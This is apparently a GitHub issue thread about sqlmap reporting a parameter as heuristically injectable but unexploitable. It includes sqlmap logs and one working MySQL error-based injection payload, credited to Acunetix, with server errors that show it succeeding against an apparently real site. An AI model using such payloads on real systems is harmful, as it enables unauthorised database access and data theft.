Closed WilliJoin closed 10 years ago
read this: A) "heuristic (basic) test shows that GET parameter 'page' might be injectable" B) "unexploitable injection point detected"
in lots of cases there is a WAF that blocks the exploitability. sqlmap can't say that something is vulnerable to SQLI while it's not (at least with used options/switches)
Also, ...in 90% cases heuristic (basic) test is not wrong...
. Whenever you find out by yourself MANUALLY that sqlmap is wrong and you have a working SQLI payload, please free to report. Otherwise, please don't open this kind of issues
Yes i find manually in GET /id=' i get error
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'thumb' AND fi_id IS NOT NULL AND ' at line 5SERVER DATA: in GET /id='and(select%201%20from(select%20count(_)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(51)%2cCHAR(116)%2cCHAR(56)%2cCHAR(103)%2cCHAR(120)%2cCHAR(55)%2cCHAR(97)%2cCHAR(120))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)_2))x%20from%20information_schema.tables%20group%20by%20x)a)and' i get error
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '4Cu3t8gx7ax1' for key 'group_key'SERVER DATA Sqlmap says [10:27:45] [INFO] heuristic (basic) test shows that GET parameter 'id' migh t be injectable (possible DBMS: 'MySQL') [10:27:45] [INFO] testing for SQL injection on GET parameter 'id' [10:27:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:27:51] [WARNING] reflective value(s) found and filtering out [10:28:02] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable ..... [10:38:38] [WARNING] false positive or unexploitable injection point detected
and(select
<- this looks like a WAF bypass trick. You've copy/pasted this from somewhere, right?
after unsuccessful exploit wiht sqlmap, i post /id=' this sqlinj in acunetix and it give me 'and(select' this payload
usage of (
for WAF bypass is hard to implement as it is context sensitive. Acunetix has a predefined set of payloads to check, so it doesn't have to bother with their proper working.
Why in 90% cases heuristic (basic) test is not wrong but sqlmap cant find sqlinj? Sqlinj exist but sqlmap cant exploit it?
[06:00:45] [INFO] heuristic (basic) test shows that GET parameter 'page' might b e injectable (possible DBMS: 'MySQL') ...... [08:22:04] [WARNING] GET parameter 'page' is not injectable
[10:27:45] [INFO] heuristic (basic) test shows that GET parameter 'id' migh t be injectable (possible DBMS: 'MySQL') [10:27:45] [INFO] testing for SQL injection on GET parameter 'id' [10:27:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:27:51] [WARNING] reflective value(s) found and filtering out [10:28:02] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable ..... [10:38:38] [WARNING] false positive or unexploitable injection point detected